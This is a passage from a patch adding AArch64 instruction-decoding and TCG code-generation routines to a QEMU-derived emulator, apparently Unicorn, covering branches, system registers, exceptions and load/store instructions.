0) + */ +static inline AArch64DecodeFn *lookup_disas_fn(const AArch64DecodeTable *table, + uint32_t insn) +{ + const AArch64DecodeTable *tptr = table; + + while (tptr->mask) { + if ((insn & tptr->mask) == tptr->pattern) { + return tptr->disas_fn; + } + tptr++; + } + return NULL; +} + +/* + * the instruction disassembly implemented here matches + * the instruction encoding classifications in chapter 3 (C3) + * of the ARM Architecture Reference Manual (DDI0487A_a) + */ + +/* C3.2.7 Unconditional branch (immediate) + * 31 30 26 25 0 + * +----+-----------+-------------------------------------+ + * | op | 0 0 1 0 1 | imm26 | + * +----+-----------+-------------------------------------+ + */ +static void disas_uncond_b_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint64_t addr = s->pc + sextract32(insn, 0, 26) * 4 - 4; + + if (insn & (1U << 31)) { + /* C5.6.26 BL Branch with link */ + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->pc); + } + + /* C5.6.20 B Branch / C5.6.26 BL Branch with link */ + gen_goto_tb(s, 0, addr); +} + +/* C3.2.1 Compare & branch (immediate) + * 31 30 25 24 23 5 4 0 + * +----+-------------+----+---------------------+--------+ + * | sf | 0 1 1 0 1 0 | op | imm19 | Rt | + * +----+-------------+----+---------------------+--------+ + */ +static void disas_comp_b_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, op, rt; + uint64_t addr; + int label_match; + TCGv_i64 tcg_cmp; + + sf = extract32(insn, 31, 1); + op = extract32(insn, 24, 1); /* 0: CBZ; 1: CBNZ */ + rt = extract32(insn, 0, 5); + addr = s->pc + sextract32(insn, 5, 19) * 4 - 4; + + tcg_cmp = read_cpu_reg(s, rt, sf); + label_match = gen_new_label(tcg_ctx); + + tcg_gen_brcondi_i64(tcg_ctx, op ? TCG_COND_NE : TCG_COND_EQ, + tcg_cmp, 0, label_match); + + gen_goto_tb(s, 0, s->pc); + gen_set_label(tcg_ctx, label_match); + gen_goto_tb(s, 1, addr); +} + +/* C3.2.5 Test & branch (immediate) + * 31 30 25 24 23 19 18 5 4 0 + * +----+-------------+----+-------+-------------+------+ + * | b5 | 0 1 1 0 1 1 | op | b40 | imm14 | Rt | + * +----+-------------+----+-------+-------------+------+ + */ +static void disas_test_b_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int bit_pos, op, rt; + uint64_t addr; + int label_match; + TCGv_i64 tcg_cmp; + + bit_pos = (extract32(insn, 31, 1) << 5) | extract32(insn, 19, 5); + op = extract32(insn, 24, 1); /* 0: TBZ; 1: TBNZ */ + addr = s->pc + sextract32(insn, 5, 14) * 4 - 4; + rt = extract32(insn, 0, 5); + + tcg_cmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_andi_i64(tcg_ctx, tcg_cmp, cpu_reg(s, rt), (1ULL << bit_pos)); + label_match = gen_new_label(tcg_ctx); + tcg_gen_brcondi_i64(tcg_ctx, op ? TCG_COND_NE : TCG_COND_EQ, + tcg_cmp, 0, label_match); + tcg_temp_free_i64(tcg_ctx, tcg_cmp); + gen_goto_tb(s, 0, s->pc); + gen_set_label(tcg_ctx, label_match); + gen_goto_tb(s, 1, addr); +} + +/* C3.2.2 / C5.6.19 Conditional branch (immediate) + * 31 25 24 23 5 4 3 0 + * +---------------+----+---------------------+----+------+ + * | 0 1 0 1 0 1 0 | o1 | imm19 | o0 | cond | + * +---------------+----+---------------------+----+------+ + */ +static void disas_cond_b_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int cond; + uint64_t addr; + + if ((insn & (1 << 4)) || (insn & (1 << 24))) { + unallocated_encoding(s); + return; + } + addr = s->pc + sextract32(insn, 5, 19) * 4 - 4; + cond = extract32(insn, 0, 4); + + if (cond < 0x0e) { + /* genuinely conditional branches */ + int label_match = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond, label_match); + gen_goto_tb(s, 0, s->pc); + gen_set_label(tcg_ctx, label_match); + gen_goto_tb(s, 1, addr); + } else { + /* 0xe and 0xf are both "always" conditions */ + gen_goto_tb(s, 0, addr); + } +} + +/* C5.6.68 HINT */ +static void handle_hint(DisasContext *s, uint32_t insn, + unsigned int op1, unsigned int op2, unsigned int crm) +{ + unsigned int selector = crm << 3 | op2; + + if (op1 != 3) { + unallocated_encoding(s); + return; + } + + switch (selector) { + case 0: /* NOP */ + return; + case 3: /* WFI */ + s->is_jmp = DISAS_WFI; + return; + case 1: /* YIELD */ + case 2: /* WFE */ + s->is_jmp = DISAS_WFE; + return; + case 4: /* SEV */ + case 5: /* SEVL */ + /* we treat all as NOP at least for now */ + return; + default: + /* default specified as NOP equivalent */ + return; + } +} + +static void gen_clrex(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); +} + +/* CLREX, DSB, DMB, ISB */ +static void handle_sync(DisasContext *s, uint32_t insn, + unsigned int op1, unsigned int op2, unsigned int crm) +{ + if (op1 != 3) { + unallocated_encoding(s); + return; + } + + switch (op2) { + case 2: /* CLREX */ + gen_clrex(s, insn); + return; + case 4: /* DSB */ + case 5: /* DMB */ + case 6: /* ISB */ + /* We don't emulate caches so barriers are no-ops */ + return; + default: + unallocated_encoding(s); + return; + } +} + +/* C5.6.130 MSR (immediate) - move immediate to processor state field */ +static void handle_msr_i(DisasContext *s, uint32_t insn, + unsigned int op1, unsigned int op2, unsigned int crm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op = op1 << 3 | op2; + switch (op) { + case 0x05: /* SPSel */ + if (s->current_el == 0) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x1e: /* DAIFSet */ + case 0x1f: /* DAIFClear */ + { + TCGv_i32 tcg_imm = tcg_const_i32(tcg_ctx, crm); + TCGv_i32 tcg_op = tcg_const_i32(tcg_ctx, op); + gen_a64_set_pc_im(s, s->pc - 4); + gen_helper_msr_i_pstate(tcg_ctx, tcg_ctx->cpu_env, tcg_op, tcg_imm); + tcg_temp_free_i32(tcg_ctx, tcg_imm); + tcg_temp_free_i32(tcg_ctx, tcg_op); + s->is_jmp = DISAS_UPDATE; + break; + } + default: + unallocated_encoding(s); + return; + } +} + +static void gen_get_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt) +{ + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx); + + /* build bit 31, N */ + tcg_gen_andi_i32(tcg_ctx, nzcv, tcg_ctx->cpu_NF, (1U << 31)); + /* build bit 30, Z */ + tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, tcg_ctx->cpu_ZF, 0); + tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 30, 1); + /* build bit 29, C */ + tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tcg_ctx->cpu_CF, 29, 1); + /* build bit 28, V */ + tcg_gen_shri_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, 31); + tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 28, 1); + /* generate result */ + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rt, nzcv); + + tcg_temp_free_i32(tcg_ctx, nzcv); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void gen_set_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt) + +{ + TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx); + + /* take NZCV from R[t] */ + tcg_gen_trunc_i64_i32(tcg_ctx, nzcv, tcg_rt); + + /* bit 31, N */ + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_NF, nzcv, (1U << 31)); + /* bit 30, Z */ + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, nzcv, (1 << 30)); + tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 0); + /* bit 29, C */ + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, nzcv, (1 << 29)); + tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 29); + /* bit 28, V */ + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_VF, nzcv, (1 << 28)); + tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, 3); + tcg_temp_free_i32(tcg_ctx, nzcv); +} + +/* C5.6.129 MRS - move from system register + * C5.6.131 MSR (register) - move to system register + * C5.6.204 SYS + * C5.6.205 SYSL + * These are all essentially the same insn in 'read' and 'write' + * versions, with varying op0 fields. + */ +static void handle_sys(DisasContext *s, uint32_t insn, bool isread, + unsigned int op0, unsigned int op1, unsigned int op2, + unsigned int crn, unsigned int crm, unsigned int rt) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + const ARMCPRegInfo *ri; + TCGv_i64 tcg_rt; + + ri = get_arm_cp_reginfo(s->cp_regs, + ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, + crn, crm, op0, op1, op2)); + + if (!ri) { + /* Unknown register; this might be a guest error or a QEMU + * unimplemented feature. + */ + qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch64 " + "system register op0:%d op1:%d crn:%d crm:%d op2:%d\n", + isread ? "read" : "write", op0, op1, crn, crm, op2); + unallocated_encoding(s); + return; + } + + /* Check access permissions */ + if (!cp_access_ok(s->current_el, ri, isread)) { + unallocated_encoding(s); + return; + } + + if (ri->accessfn) { + /* Emit code to perform further access permissions checks at + * runtime; this may result in an exception. + */ + TCGv_ptr tmpptr; + TCGv_i32 tcg_syn; + uint32_t syndrome; + + gen_a64_set_pc_im(s, s->pc - 4); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + syndrome = syn_aa64_sysregtrap(op0, op1, op2, crn, crm, rt, isread); + tcg_syn = tcg_const_i32(tcg_ctx, syndrome); + gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + tcg_temp_free_i32(tcg_ctx, tcg_syn); + } + + /* Handle special cases first */ + switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) { + case ARM_CP_NOP: + return; + case ARM_CP_NZCV: + tcg_rt = cpu_reg(s, rt); + if (isread) { + gen_get_nzcv(tcg_ctx, tcg_rt); + } else { + gen_set_nzcv(tcg_ctx, tcg_rt); + } + return; + case ARM_CP_CURRENTEL: + /* Reads as current EL value from pstate, which is + * guaranteed to be constant by the tb flags. + */ + tcg_rt = cpu_reg(s, rt); + tcg_gen_movi_i64(tcg_ctx, tcg_rt, s->current_el << 2); + return; + case ARM_CP_DC_ZVA: + /* Writes clear the aligned block of memory which rt points into. */ + tcg_rt = cpu_reg(s, rt); + gen_helper_dc_zva(tcg_ctx, tcg_ctx->cpu_env, tcg_rt); + return; + default: + break; + } + + tcg_rt = cpu_reg(s, rt); + + if (isread) { + if (ri->type & ARM_CP_CONST) { + tcg_gen_movi_i64(tcg_ctx, tcg_rt, ri->resetvalue); + } else if (ri->readfn) { + TCGv_ptr tmpptr; + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_get_cp_reg64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, tmpptr); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tcg_gen_ld_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset); + } + } else { + if (ri->type & ARM_CP_CONST) { + /* If not forbidden by access permissions, treat as WI */ + return; + } else if (ri->writefn) { + TCGv_ptr tmpptr; + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_rt); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tcg_gen_st_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset); + } + } + + if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) { + /* We default to ending the TB on a coprocessor register write, + * but allow this to be suppressed by the register definition + * (usually only necessary to work around guest bugs). + */ + s->is_jmp = DISAS_UPDATE; + } +} + +/* C3.2.4 System + * 31 22 21 20 19 18 16 15 12 11 8 7 5 4 0 + * +---------------------+---+-----+-----+-------+-------+-----+------+ + * | 1 1 0 1 0 1 0 1 0 0 | L | op0 | op1 | CRn | CRm | op2 | Rt | + * +---------------------+---+-----+-----+-------+-------+-----+------+ + */ +static void disas_system(DisasContext *s, uint32_t insn) +{ + unsigned int l, op0, op1, crn, crm, op2, rt; + l = extract32(insn, 21, 1); + op0 = extract32(insn, 19, 2); + op1 = extract32(insn, 16, 3); + crn = extract32(insn, 12, 4); + crm = extract32(insn, 8, 4); + op2 = extract32(insn, 5, 3); + rt = extract32(insn, 0, 5); + + if (op0 == 0) { + if (l || rt != 31) { + unallocated_encoding(s); + return; + } + switch (crn) { + case 2: /* C5.6.68 HINT */ + handle_hint(s, insn, op1, op2, crm); + break; + case 3: /* CLREX, DSB, DMB, ISB */ + handle_sync(s, insn, op1, op2, crm); + break; + case 4: /* C5.6.130 MSR (immediate) */ + handle_msr_i(s, insn, op1, op2, crm); + break; + default: + unallocated_encoding(s); + break; + } + return; + } + handle_sys(s, insn, l, op0, op1, op2, crn, crm, rt); +} + +/* C3.2.3 Exception generation + * + * 31 24 23 21 20 5 4 2 1 0 + * +-----------------+-----+------------------------+-----+----+ + * | 1 1 0 1 0 1 0 0 | opc | imm16 | op2 | LL | + * +-----------------------+------------------------+----------+ + */ +static void disas_exc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opc = extract32(insn, 21, 3); + int op2_ll = extract32(insn, 0, 5); + int imm16 = extract32(insn, 5, 16); + TCGv_i32 tmp; + + switch (opc) { + case 0: + /* For SVC, HVC and SMC we advance the single-step state + * machine before taking the exception. This is architecturally + * mandated, to ensure that single-stepping a system call + * instruction works properly. + */ + switch (op2_ll) { + case 1: + gen_ss_advance(s); + gen_exception_insn(s, 0, EXCP_SWI, syn_aa64_svc(imm16)); + break; + case 2: + if (s->current_el == 0) { + unallocated_encoding(s); + break; + } + /* The pre HVC helper handles cases when HVC gets trapped + * as an undefined insn by runtime configuration. + */ + gen_a64_set_pc_im(s, s->pc - 4); + gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env); + gen_ss_advance(s); + gen_exception_insn(s, 0, EXCP_HVC, syn_aa64_hvc(imm16)); + break; + case 3: + if (s->current_el == 0) { + unallocated_encoding(s); + break; + } + gen_a64_set_pc_im(s, s->pc - 4); + tmp = tcg_const_i32(tcg_ctx, syn_aa64_smc(imm16)); + gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_ss_advance(s); + gen_exception_insn(s, 0, EXCP_SMC, syn_aa64_smc(imm16)); + break; + default: + unallocated_encoding(s); + break; + } + break; + case 1: + if (op2_ll != 0) { + unallocated_encoding(s); + break; + } + /* BRK */ + gen_exception_insn(s, 4, EXCP_BKPT, syn_aa64_bkpt(imm16)); + break; + case 2: + if (op2_ll != 0) { + unallocated_encoding(s); + break; + } + /* HLT */ + unsupported_encoding(s, insn); + break; + case 5: + if (op2_ll < 1 || op2_ll > 3) { + unallocated_encoding(s); + break; + } + /* DCPS1, DCPS2, DCPS3 */ + unsupported_encoding(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.2.7 Unconditional branch (register) + * 31 25 24 21 20 16 15 10 9 5 4 0 + * +---------------+-------+-------+-------+------+-------+ + * | 1 1 0 1 0 1 1 | opc | op2 | op3 | Rn | op4 | + * +---------------+-------+-------+-------+------+-------+ + */ +static void disas_uncond_b_reg(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int opc, op2, op3, rn, op4; + + opc = extract32(insn, 21, 4); + op2 = extract32(insn, 16, 5); + op3 = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + op4 = extract32(insn, 0, 5); + + if (op4 != 0x0 || op3 != 0x0 || op2 != 0x1f) { + unallocated_encoding(s); + return; + } + + switch (opc) { + case 0: /* BR */ + case 2: /* RET */ + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_pc, cpu_reg(s, rn)); + break; + case 1: /* BLR */ + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_pc, cpu_reg(s, rn)); + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->pc); + break; + case 4: /* ERET */ + if (s->current_el == 0) { + unallocated_encoding(s); + return; + } + gen_helper_exception_return(tcg_ctx, tcg_ctx->cpu_env); + s->is_jmp = DISAS_JUMP; + return; + case 5: /* DRPS */ + if (rn != 0x1f) { + unallocated_encoding(s); + } else { + unsupported_encoding(s, insn); + } + return; + default: + unallocated_encoding(s); + return; + } + + s->is_jmp = DISAS_JUMP; +} + +/* C3.2 Branches, exception generating and system instructions */ +static void disas_b_exc_sys(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 25, 7)) { + case 0x0a: case 0x0b: + case 0x4a: case 0x4b: /* Unconditional branch (immediate) */ + disas_uncond_b_imm(s, insn); + break; + case 0x1a: case 0x5a: /* Compare & branch (immediate) */ + disas_comp_b_imm(s, insn); + break; + case 0x1b: case 0x5b: /* Test & branch (immediate) */ + disas_test_b_imm(s, insn); + break; + case 0x2a: /* Conditional branch (immediate) */ + disas_cond_b_imm(s, insn); + break; + case 0x6a: /* Exception generation / System */ + if (insn & (1 << 24)) { + disas_system(s, insn); + } else { + disas_exc(s, insn); + } + break; + case 0x6b: /* Unconditional branch (register) */ + disas_uncond_b_reg(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* + * Load/Store exclusive instructions are implemented by remembering + * the value/address loaded, and seeing if these are the same + * when the store is performed. This is not actually the architecturally + * mandated semantics, but it works for typical guest code sequences + * and avoids having to monitor regular stores. + * + * In system emulation mode only one CPU will be running at once, so + * this sequence is effectively atomic. In user emulation mode we + * throw an exception and handle the atomic operation elsewhere. + */ +static void gen_load_exclusive(DisasContext *s, int rt, int rt2, + TCGv_i64 addr, int size, bool is_pair) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); + TCGMemOp memop = MO_TE + size; + + g_assert(size <= 3); + tcg_gen_qemu_ld_i64(s->uc, tmp, addr, get_mem_index(s), memop); + + if (is_pair) { + TCGv_i64 addr2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 hitmp = tcg_temp_new_i64(tcg_ctx); + + g_assert(size >= 2); + tcg_gen_addi_i64(tcg_ctx, addr2, addr, 1ULL << size); + tcg_gen_qemu_ld_i64(s->uc, hitmp, addr2, get_mem_index(s), memop); + tcg_temp_free_i64(tcg_ctx, addr2); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_high, hitmp); + tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt2), hitmp); + tcg_temp_free_i64(tcg_ctx, hitmp); + } + + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp); + tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt), tmp); + + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr); +} + +#ifdef CONFIG_USER_ONLY +static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, + TCGv_i64 addr, int size, int is_pair) +{ + tcg_gen_mov_i64(tcg_ctx, cpu_exclusive_test, addr); + tcg_gen_movi_i32(tcg_ctx, cpu_exclusive_info, + size | is_pair << 2 | (rd << 4) | (rt << 9) | (rt2 << 14)); + gen_exception_internal_insn(s, 4, EXCP_STREX); +} +#else +static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, + TCGv_i64 inaddr, int size, int is_pair) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* if (env->exclusive_addr == addr && env->exclusive_val == [addr] + * && (!is_pair || env->exclusive_high == [addr + datasize])) { + * [addr] = {Rt}; + * if (is_pair) { + * [addr + datasize] = {Rt2}; + * } + * {Rd} = 0; + * } else { + * {Rd} = 1; + * } + * env->exclusive_addr = -1; + */ + int fail_label = gen_new_label(tcg_ctx); + int done_label = gen_new_label(tcg_ctx); + TCGv_i64 addr = tcg_temp_local_new_i64(tcg_ctx); + TCGv_i64 tmp; + + /* Copy input into a local temp so it is not trashed when the + * basic block ends at the branch insn. + */ + tcg_gen_mov_i64(tcg_ctx, addr, inaddr); + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, addr, tcg_ctx->cpu_exclusive_addr, fail_label); + + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld_i64(s->uc, tmp, addr, get_mem_index(s), MO_TE + size); + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, tmp, tcg_ctx->cpu_exclusive_val, fail_label); + tcg_temp_free_i64(tcg_ctx, tmp); + + if (is_pair) { + TCGv_i64 addrhi = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tmphi = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_addi_i64(tcg_ctx, addrhi, addr, 1ULL << size); + tcg_gen_qemu_ld_i64(s->uc, tmphi, addrhi, get_mem_index(s), MO_TE + size); + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, tmphi, tcg_ctx->cpu_exclusive_high, fail_label); + + tcg_temp_free_i64(tcg_ctx, tmphi); + tcg_temp_free_i64(tcg_ctx, addrhi); + } + + /* We seem to still have the exclusive monitor, so do the store */ + tcg_gen_qemu_st_i64(s->uc, cpu_reg(s, rt), addr, get_mem_index(s), MO_TE + size); + if (is_pair) { + TCGv_i64 addrhi = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_addi_i64(tcg_ctx, addrhi, addr, 1ULL << size); + tcg_gen_qemu_st_i64(s->uc, cpu_reg(s, rt2), addrhi, + get_mem_index(s), MO_TE + size); + tcg_temp_free_i64(tcg_ctx, addrhi); + } + + tcg_temp_free_i64(tcg_ctx, addr); + + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), 0); + tcg_gen_br(tcg_ctx, done_label); + gen_set_label(tcg_ctx, fail_label); + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), 1); + gen_set_label(tcg_ctx, done_label); + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); + +} +#endif + +/* C3.3.6 Load/store exclusive + * + * 31 30 29 24 23 22 21 20 16 15 14 10 9 5 4 0 + * +-----+-------------+----+---+----+------+----+-------+------+------+ + * | sz | 0 0 1 0 0 0 | o2 | L | o1 | Rs | o0 | Rt2 | Rn | Rt | + * +-----+-------------+----+---+----+------+----+-------+------+------+ + * + * sz: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64 bit + * L: 0 -> store, 1 -> load + * o2: 0 -> exclusive, 1 -> not + * o1: 0 -> single register, 1 -> register pair + * o0: 1 -> load-acquire/store-release, 0 -> not + * + * o0 == 0 AND o2 == 1 is un-allocated + * o1 == 1 is un-allocated except for 32 and 64 bit sizes + */ +static void disas_ldst_excl(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int rt2 = extract32(insn, 10, 5); + int is_lasr = extract32(insn, 15, 1); + int rs = extract32(insn, 16, 5); + int is_pair = extract32(insn, 21, 1); + int is_store = !extract32(insn, 22, 1); + int is_excl = !extract32(insn, 23, 1); + int size = extract32(insn, 30, 2); + TCGv_i64 tcg_addr; + + if ((!is_excl && !is_lasr) || + (is_pair && size < 2)) { + unallocated_encoding(s); + return; + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + + /* Note that since TCG is single threaded load-acquire/store-release + * semantics require no extra if (is_lasr) { ... } handling. + */ + + if (is_excl) { + if (!is_store) { + s->is_ldex = true; + gen_load_exclusive(s, rt, rt2, tcg_addr, size, is_pair); + } else { + gen_store_exclusive(s, rs, rt, rt2, tcg_addr, size, is_pair); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + if (is_store) { + do_gpr_st(s, tcg_rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, false, false); + } + if (is_pair) { + TCGv_i64 tcg_rt2 = cpu_reg(s, rt); + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, 1ULL << size); + if (is_store) { + do_gpr_st(s, tcg_rt2, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt2, tcg_addr, size, false, false); + } + } + } +} + +/* + * C3.3.5 Load register (literal) + * + * 31 30 29 27 26 25 24 23 5 4 0 + * +-----+-------+---+-----+-------------------+-------+ + * | opc | 0 1 1 | V | 0 0 | imm19 | Rt | + * +-----+-------+---+-----+-------------------+-------+ + * + * V: 1 -> vector (simd/fp) + * opc (non-vector): 00 -> 32 bit, 01 -> 64 bit, + * 10-> 32 bit signed, 11 -> prefetch + * opc (vector): 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit (11 unallocated) + */ +static void disas_ld_lit(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int64_t imm = (int32_t)(((uint32_t)sextract32(insn, 5, 19)) << 2); + bool is_vector = extract32(insn, 26, 1); + int opc = extract32(insn, 30, 2); + bool is_signed = false; + int size = 2; + TCGv_i64 tcg_rt, tcg_addr; + + if (is_vector) { + if (opc == 3) { + unallocated_encoding(s); + return; + } + size = 2 + opc; + if (!fp_access_check(s)) { + return; + } + } else { + if (opc == 3) { + /* PRFM (literal) : prefetch */ + return; + } + size = 2 + extract32(opc, 0, 1); + is_signed = extract32(opc, 1, 1); + } + + tcg_rt = cpu_reg(s, rt); + + tcg_addr = tcg_const_i64(tcg_ctx, (s->pc - 4) + imm); + if (is_vector) { + do_fp_ld(s, rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, false); + } + tcg_temp_free_i64(tcg_ctx, tcg_addr); +} + +/* + * C5.6.80 LDNP (Load Pair - non-temporal hint) + * C5.6.81 LDP (Load Pair - non vector) + * C5.6.82 LDPSW (Load Pair Signed Word - non vector) + * C5.6.176 STNP (Store Pair - non-temporal hint) + * C5.6.177 STP (Store Pair - non vector) + * C6.3.165 LDNP (Load Pair of SIMD&FP - non-temporal hint) + * C6.3.165 LDP (Load Pair of SIMD&FP) + * C6.3.284 STNP (Store Pair of SIMD&FP - non-temporal hint) + * C6.3.284 STP (Store Pair of SIMD&FP) + * + * 31 30 29 27 26 25 24 23 22 21 15 14 10 9 5 4 0 + * +-----+-------+---+---+-------+---+-----------------------------+ + * | opc | 1 0 1 | V | 0 | index | L | imm7 | Rt2 | Rn | Rt | + * +-----+-------+---+---+-------+---+-------+-------+------+------+ + * + * opc: LDP/STP/LDNP/STNP 00 -> 32 bit, 10 -> 64 bit + * LDPSW 01 + * LDP/STP/LDNP/STNP (SIMD) 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit + * V: 0 -> GPR, 1 -> Vector + * idx: 00 -> signed offset with non-temporal hint, 01 -> post-index, + * 10 -> signed offset, 11 -> pre-index + * L: 0 -> Store 1 -> Load + * + * Rt, Rt2 = GPR or SIMD registers to be stored + * Rn = general purpose register containing address + * imm7 = signed offset (multiple of 4 or 8 depending on size) + */ +static void disas_ldst_pair(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int rt2 = extract32(insn, 10, 5); + uint64_t offset = sextract64(insn, 15, 7); + int index = extract32(insn, 23, 2); + bool is_vector = extract32(insn, 26, 1); + bool is_load = extract32(insn, 22, 1); + int opc = extract32(insn, 30, 2); + + bool is_signed = false; + bool postindex = false; + bool wback = false; + + TCGv_i64 tcg_addr; /* calculated address */ + int size; + + if (opc == 3) { + unallocated_encoding(s); + return; + } + + if (is_vector) { + size = 2 + opc; + } else { + size = 2 + extract32(opc, 1, 1); + is_signed = extract32(opc, 0, 1); + if (!is_load && is_signed) { + unallocated_encoding(s); + return; + } + } + + switch (index) { + case 1: /* post-index */ + postindex = true; + wback = true; + break; + case 0: + /* signed offset with "non-temporal" hint. Since we don't emulate + * caches we don't care about hints to the cache system about + * data access patterns, and handle this identically to plain + * signed offset. + */ + if (is_signed) { + /* There is no non-temporal-hint version of LDPSW */ + unallocated_encoding(s); + return; + } + postindex = false; + break; + case 2: /* signed offset, rn not updated */ + postindex = false; + break; + case 3: /* pre-index */ + postindex = false; + wback = true; + break; + } + + if (is_vector && !fp_access_check(s)) { + return; + } + + offset <<= size; + + if (rn == 31) { + gen_check_sp_alignment(s); + } + + tcg_addr = read_cpu_reg_sp(s, rn, 1); + + if (!postindex) { + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, offset); + } + + if (is_vector) { + if (is_load) { + do_fp_ld(s, rt, tcg_addr, size); + } else { + do_fp_st(s, rt, tcg_addr, size); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + if (is_load) { + do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, 